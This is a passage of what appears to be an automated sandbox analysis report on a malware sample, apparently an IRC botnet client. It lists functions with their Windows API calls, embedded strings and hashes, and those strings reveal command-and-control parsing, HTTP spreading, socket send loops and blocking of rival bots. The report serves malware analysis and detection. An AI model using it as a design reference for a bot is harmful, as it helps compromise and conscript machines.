                                                                  • htons.WS2_32(00000050), ref: 00369A28
                                                                  • GetTickCount.KERNEL32(00000050,?), ref: 00369A3A
                                                                  • GetTickCount.KERNEL32 ref: 00369A4D
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00369A7B
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00369A96
                                                                  • connect.WS2_32(?,?,00000010), ref: 00369AB1
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 00369ABE
                                                                  • GetTickCount.KERNEL32 ref: 00369AC4
                                                                  • lstrcpyA.KERNEL32(00000000,X-a: b), ref: 00369AFE
                                                                  • lstrcpyA.KERNEL32(00000000,Connection: Close), ref: 00369B0C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00369B0F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00369B41
                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000), ref: 00369B51
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00369B5E
                                                                  • GetTickCount.KERNEL32 ref: 00369B66
                                                                  • Sleep.KERNEL32(000009C4), ref: 00369B7F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00369BBE
                                                                  • GetTickCount.KERNEL32(?,00000000,00000000,00000000), ref: 00369BD2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00369BE4
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00369C1E
                                                                  • closesocket.WS2_32(?), ref: 00369C38
                                                                  • GetTickCount.KERNEL32(?,?,00000000,00000000,00000000), ref: 00369C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleeplstrlensend$lstrcpymemset$Startupclosesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID: Connection: Close$X-a: b
                                                                  • API String ID: 1989272289-3524857483
                                                                  • Opcode ID: aa921787c2fd7cae5862af6a1dade1947ecb8d2fd0d23d107454cba74a7930f3
                                                                  • Instruction ID: 5930f3b0dcbe1883dc63007a31630af5433df169f896a85eb7d1770209fafab4
                                                                  • Opcode Fuzzy Hash: aa921787c2fd7cae5862af6a1dade1947ecb8d2fd0d23d107454cba74a7930f3
                                                                  • Instruction Fuzzy Hash: 7371EC72900118ABD732EBA4DC85FDE77ADEB88700F51C956EA0DEB184D6749E41CF90
                                                                  Function 0040AFA0 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 149stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Alloc_memicmp_snprintfmemsetstrtok$Freelstrcpynsscanf
                                                                  • String ID: HTTP$Host: $POST /%1023s$http://%s/$http://%s/%s
                                                                  • API String ID: 3179755921-1264106924
                                                                  • Opcode ID: 6a7b048e49f5e46d75e327f42497c877a8154ec3d200563e306c4c1fee2733ba
                                                                  • Instruction ID: b9d19011a538f4e63f226923da5865426bd74754d0a48babbb538e4dd702a74a
                                                                  • Opcode Fuzzy Hash: 6a7b048e49f5e46d75e327f42497c877a8154ec3d200563e306c4c1fee2733ba
                                                                  • Instruction Fuzzy Hash: 704107B6D8021877D720EB618D42FEB736CDB44750F0444A6FB08F2181E6B89A958BED
                                                                  Function 0036AFA0 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 149stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Alloc_memicmp_snprintfmemsetstrtok$Freelstrcpynsscanf
                                                                  • String ID: HTTP$Host: $POST /%1023s$http://%s/$http://%s/%s
                                                                  • API String ID: 3179755921-1264106924
                                                                  • Opcode ID: 7f7ac1848b959075ae68d994c6568a9f2d74d18bfd95b842e533003d5e6dec95
                                                                  • Instruction ID: c5b3942b70ec49dd057bcc01e589a3d67f3b2ee074f4d30028f536f15dbf91e7
                                                                  • Opcode Fuzzy Hash: 7f7ac1848b959075ae68d994c6568a9f2d74d18bfd95b842e533003d5e6dec95
                                                                  • Instruction Fuzzy Hash: 8641D6B6940218BBD736A7A48C42FEBB3ACDB45710F048594FB0CE6145E7749A858BE1
                                                                  Function 00406A40 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 166stringthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406A68
                                                                  • lstrlenA.KERNEL32 ref: 00406B03
                                                                  • _memicmp.MSVCRT ref: 00406B0E
                                                                  • _memicmp.MSVCRT ref: 00406B22
                                                                  • _memicmp.MSVCRT ref: 00406B36
                                                                  • sscanf.MSVCRT ref: 00406B4F
                                                                  • sscanf.MSVCRT ref: 00406B69
                                                                  • lstrlenA.KERNEL32(?), ref: 00406BD5
                                                                  • SetFileAttributesW.KERNEL32(0044A710,00000080), ref: 00406C31
                                                                  • MoveFileExW.KERNEL32(0044A710,00000000,00000004), ref: 00406C40
                                                                  • closesocket.WS2_32(?), ref: 00406C60
                                                                  • ExitThread.KERNEL32 ref: 00406C67
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A335
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A34F
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A369
                                                                    • Part of subcall function 0040A310: _vsnprintf.MSVCRT ref: 0040A382
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A39A
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                    • Part of subcall function 0040A310: _snprintf.MSVCRT ref: 0040A3CC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A3EC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                    • Part of subcall function 0040A310: EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                    • Part of subcall function 0040A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                    • Part of subcall function 0040A310: LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$File_memicmp$CriticalSectionsprintfsscanf$AttributesCreateEnterExitLeaveMoveThread_snprintf_vsnprintfclosesocket
                                                                  • String ID: %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).$%s.Detected process "%S" sending an IRC packet to server %s:%d.$%s:%d$JOIN$JOIN %255s$PRIVMSG$PRIVMSG %255s$block$cnc$pdef
                                                                  • API String ID: 1085873876-1467418891
                                                                  • Opcode ID: e046ed22e18b5f022a18a89072ff7c27e4d94646e1ec26cf3a102e4814f05911
                                                                  • Instruction ID: 423ddb9557b74d048bf2445d23ea001235c7c8144a5ecbbbaa60eb2ae93ad116
                                                                  • Opcode Fuzzy Hash: e046ed22e18b5f022a18a89072ff7c27e4d94646e1ec26cf3a102e4814f05911
                                                                  • Instruction Fuzzy Hash: A0510A71A402147AEB20AB558C86FDF7378AB44744F15443BFE05B22D1D6BCA9A0C66E
                                                                  Function 00366A40 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 166stringthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00366A68
                                                                  • lstrlenA.KERNEL32 ref: 00366B03
                                                                  • _memicmp.MSVCRT ref: 00366B0E
                                                                  • _memicmp.MSVCRT ref: 00366B22
                                                                  • _memicmp.MSVCRT ref: 00366B36
                                                                  • sscanf.MSVCRT ref: 00366B4F
                                                                  • sscanf.MSVCRT ref: 00366B69
                                                                  • lstrlenA.KERNEL32(?), ref: 00366BD5
                                                                  • SetFileAttributesW.KERNEL32(003AA710,00000080), ref: 00366C31
                                                                  • MoveFileExW.KERNEL32(003AA710,00000000,00000004), ref: 00366C40
                                                                  • closesocket.WS2_32(?), ref: 00366C60
                                                                  • ExitThread.KERNEL32 ref: 00366C67
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A335
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A34F
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A369
                                                                    • Part of subcall function 0036A310: _vsnprintf.MSVCRT ref: 0036A382
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A39A
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                    • Part of subcall function 0036A310: _snprintf.MSVCRT ref: 0036A3CC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A3EC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                    • Part of subcall function 0036A310: EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                    • Part of subcall function 0036A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                    • Part of subcall function 0036A310: LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$File_memicmp$CriticalSectionsprintfsscanf$AttributesCreateEnterExitLeaveMoveThread_snprintf_vsnprintfclosesocket
                                                                  • String ID: %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).$%s.Detected process "%S" sending an IRC packet to server %s:%d.$%s:%d$JOIN$JOIN %255s$PRIVMSG$PRIVMSG %255s$block$cnc$pdef
                                                                  • API String ID: 1085873876-1467418891
                                                                  • Opcode ID: 7ea626670aec71195430e5b4b59219cb6596a04e0d519a59df40cf0a6cbbc656
                                                                  • Instruction ID: 9f087dbbe22057c7bd61358c46622ab06823b17063583d3f08f272212150ea88
                                                                  • Opcode Fuzzy Hash: 7ea626670aec71195430e5b4b59219cb6596a04e0d519a59df40cf0a6cbbc656
                                                                  • Instruction Fuzzy Hash: 1651E772940204BBDB339F598C87BEE77ACEB44784F54C468F908E7145E7B59980C6A2
                                                                  Function 00410050 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 135stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00410071
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00410080
                                                                  • lstrlenA.KERNEL32(00000000), ref: 004100AB
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 004100B6
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 004100CB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 004100D2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 004100E3
                                                                  • strtok.MSVCRT ref: 004100F9
                                                                  • strstr.MSVCRT ref: 00410117
                                                                  • strstr.MSVCRT ref: 00410129
                                                                  • lstrcatA.KERNEL32(00000000,00412B84), ref: 00410141
                                                                  • _memicmp.MSVCRT ref: 0041014E
                                                                  • lstrcatA.KERNEL32(00000000,Content-Length: ), ref: 00410160
                                                                  • _snprintf.MSVCRT ref: 00410177
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0041018A
                                                                  • strtok.MSVCRT ref: 00410193
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 004101AB
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004101B2
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004101BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Heap$Alloclstrlenstrstrstrtok$FreeProcess_memicmp_snprintflstrcpymemset
                                                                  • String ID: $Content-Length:
                                                                  • API String ID: 4006885983-3599722475
                                                                  • Opcode ID: 930fb4186d5d29aae00d3e8cc07e0d4c77cb9a1f345ff1cca50be87740647e53
                                                                  • Instruction ID: 31871e1923dfa0c5687494671088c66f74ce18a02ae0b8733e53a839020a0827
                                                                  • Opcode Fuzzy Hash: 930fb4186d5d29aae00d3e8cc07e0d4c77cb9a1f345ff1cca50be87740647e53
                                                                  • Instruction Fuzzy Hash: 4A41F671640308BBDB20AF619C45FEF776C9F58715F04411AFE08A6241E7FD9AC18BA9
                                                                  Function 00370050 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 135stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00370071
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00370080
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003700AB
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003700B6
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 003700CB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003700D2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003700E3
                                                                  • strtok.MSVCRT ref: 003700F9
                                                                  • strstr.MSVCRT ref: 00370117
                                                                  • strstr.MSVCRT ref: 00370129
                                                                  • lstrcatA.KERNEL32(00000000,00372B84), ref: 00370141
                                                                  • _memicmp.MSVCRT ref: 0037014E
                                                                  • lstrcatA.KERNEL32(00000000,Content-Length: ), ref: 00370160
                                                                  • _snprintf.MSVCRT ref: 00370177
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0037018A
                                                                  • strtok.MSVCRT ref: 00370193
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 003701AB
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003701B2
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003701BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Heap$Alloclstrlenstrstrstrtok$FreeProcess_memicmp_snprintflstrcpymemset
                                                                  • String ID: $Content-Length:
                                                                  • API String ID: 4006885983-3599722475
                                                                  • Opcode ID: 785b1f36c3484554cb94478a506b2014c95fc7e3a33d6a27746f1f97760e0a10
                                                                  • Instruction ID: 6b9da164bae029f2740c9dad6040932da04f915576571e331aa645526113dcaa
                                                                  • Opcode Fuzzy Hash: 785b1f36c3484554cb94478a506b2014c95fc7e3a33d6a27746f1f97760e0a10
                                                                  • Instruction Fuzzy Hash: BD41D276600308FBE736AB649C86FEF776C9F54711F418154FD0CAA241E6BC9A818AE1
                                                                  Function 0040A310 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 127stringfilesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040A335
                                                                  • memset.MSVCRT ref: 0040A34F
                                                                  • memset.MSVCRT ref: 0040A369
                                                                  • _vsnprintf.MSVCRT ref: 0040A382
                                                                  • sprintf.MSVCRT ref: 0040A39A
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                  • _snprintf.MSVCRT ref: 0040A3CC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                  • sprintf.MSVCRT ref: 0040A3EC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                  • EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                  • LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040A484
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A48B
                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A496
                                                                  • LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A4A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CriticalSectionmemset$FileLeavesprintf$CloseCreateEnterHandleSleepWrite_snprintf_vsnprintf
                                                                  • String ID: %d.$30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4010528547-3602371622
                                                                  • Opcode ID: b5ff21767b458ba7174b6b2b87fc53a5282e9994ed1a393112634c82c948d704
                                                                  • Instruction ID: 8e1fe3b8e3d8ffe6930c52ef9346d3acd19d967879cd91ce29727965d539cad2
                                                                  • Opcode Fuzzy Hash: b5ff21767b458ba7174b6b2b87fc53a5282e9994ed1a393112634c82c948d704
                                                                  • Instruction Fuzzy Hash: 2B41DBB6680318BBD711E7A1DD46FEA732CDF88705F004495F708E60D1DAF85A848B6D
                                                                  Function 0036A310 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 127stringfilesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036A335
                                                                  • memset.MSVCRT ref: 0036A34F
                                                                  • memset.MSVCRT ref: 0036A369
                                                                  • _vsnprintf.MSVCRT ref: 0036A382
                                                                  • sprintf.MSVCRT ref: 0036A39A
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                  • _snprintf.MSVCRT ref: 0036A3CC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                  • sprintf.MSVCRT ref: 0036A3EC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                  • EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                  • LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0036A484
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036A48B
                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A496
                                                                  • LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A4A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CriticalSectionmemset$FileLeavesprintf$CloseCreateEnterHandleSleepWrite_snprintf_vsnprintf
                                                                  • String ID: %d.$30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4010528547-3602371622
                                                                  • Opcode ID: cb384aff42950af4482244874d53568bc84263ac0237a7db9b5c0fbe6e956184
                                                                  • Instruction ID: 094304f4de7eb34230010a769aced7d87c4b4ae731eb5822ba881decc654bb99
                                                                  • Opcode Fuzzy Hash: cb384aff42950af4482244874d53568bc84263ac0237a7db9b5c0fbe6e956184
                                                                  • Instruction Fuzzy Hash: D741D9B6540218BBD736E7A4DC86FEA732CDB88711F408494F70CEA0C1DAF46A448B65
                                                                  Function 004101E0 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 189memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00410202
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00410213
                                                                  • EnterCriticalSection.KERNEL32(0044B4E4), ref: 00410223
                                                                  • strstr.MSVCRT ref: 00410243
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410254
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0041025F
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 00410272
                                                                  • strstr.MSVCRT ref: 00410281
                                                                  • _snprintf.MSVCRT ref: 004102C8
                                                                  • strstr.MSVCRT ref: 004102EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00410322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103EE
                                                                  • LeaveCriticalSection.KERNEL32(0044B4E4), ref: 004103FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Freestrstr$CriticalSectionlstrlen$AllocEnterLeaveProcess_snprintfatoilstrcpymemset
                                                                  • String ID: $%s.%s hijacked!$%s=$http$httpi$httpspread$int$msg
                                                                  • API String ID: 2097228407-1593535274
                                                                  • Opcode ID: ff486f561777821ef5b35251fa65b707b74c89090bba5d12407a9cc2068a4af8
                                                                  • Instruction ID: 6b613a8a9dd3db62d23416ef6319fd59981c507d6a8595e650e32660f9c914f4
                                                                  • Opcode Fuzzy Hash: ff486f561777821ef5b35251fa65b707b74c89090bba5d12407a9cc2068a4af8
                                                                  • Instruction Fuzzy Hash: 6851A771A40319ABDB109BA19C85BFFB778EB44704F14443AFD14A2241DAB8ADD08BAD
                                                                  Function 003701E0 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 189memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00370202
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00370213
                                                                  • EnterCriticalSection.KERNEL32(003AB4E4), ref: 00370223
                                                                  • strstr.MSVCRT ref: 00370243
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370254
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0037025F
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 00370272
                                                                  • strstr.MSVCRT ref: 00370281
                                                                  • _snprintf.MSVCRT ref: 003702C8
                                                                  • strstr.MSVCRT ref: 003702EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00370322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703EE
                                                                  • LeaveCriticalSection.KERNEL32(003AB4E4), ref: 003703FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Freestrstr$CriticalSectionlstrlen$AllocEnterLeaveProcess_snprintfatoilstrcpymemset
                                                                  • String ID: $%s.%s hijacked!$%s=$http$httpi$httpspread$int$msg
                                                                  • API String ID: 2097228407-1593535274
                                                                  • Opcode ID: de2a05e81f1c55a784774adb29724fdc543c08ba84a2788db625b74b946f50ae
                                                                  • Instruction ID: 83c4a7c6c5b6033b952e093220dd5cab71418451650e68d0a07fdf874e67edf2
                                                                  • Opcode Fuzzy Hash: de2a05e81f1c55a784774adb29724fdc543c08ba84a2788db625b74b946f50ae
                                                                  • Instruction Fuzzy Hash: 2251DA76A40615EBEB379B649C45EBFB77CEB44700F04C469F91CA6241DBB8AD008BA0
                                                                  Function 0040D220 Relevance: 34.7, APIs: 11, Strings: 12, Instructions: 209stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstrstrtok$lstrcmplstrlen
                                                                  • String ID: WA$001$332$376$433$JOIN$KCIK %s$MOTD$PING$PPNG %s$PPPPMSG$SEND %s %s
                                                                  • API String ID: 4048585210-1945936343
                                                                  • Opcode ID: b8cde92cb1254a2a7ae024d0b2fa4488480de74b93d1f53c48958e3b38037d86
                                                                  • Instruction ID: b43457d1463e33dec7e291493da2b720a1f97c649ceaa871d4bac8b1837a23f4
                                                                  • Opcode Fuzzy Hash: b8cde92cb1254a2a7ae024d0b2fa4488480de74b93d1f53c48958e3b38037d86
                                                                  • Instruction Fuzzy Hash: 4651E8B6E4020966D710B669FC42BEA736CDB84719F10817BFC08E2281F67DE85546ED
                                                                  Function 0036D220 Relevance: 34.7, APIs: 11, Strings: 12, Instructions: 209stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstrstrtok$lstrcmplstrlen
                                                                  • String ID: W7$001$332$376$433$JOIN$KCIK %s$MOTD$PING$PPNG %s$PPPPMSG$SEND %s %s
                                                                  • API String ID: 4048585210-2164369966
                                                                  • Opcode ID: 57b28443d6339407f4bb483d10d5ab8964cf87f8e9a9965947bc74028fcd8489
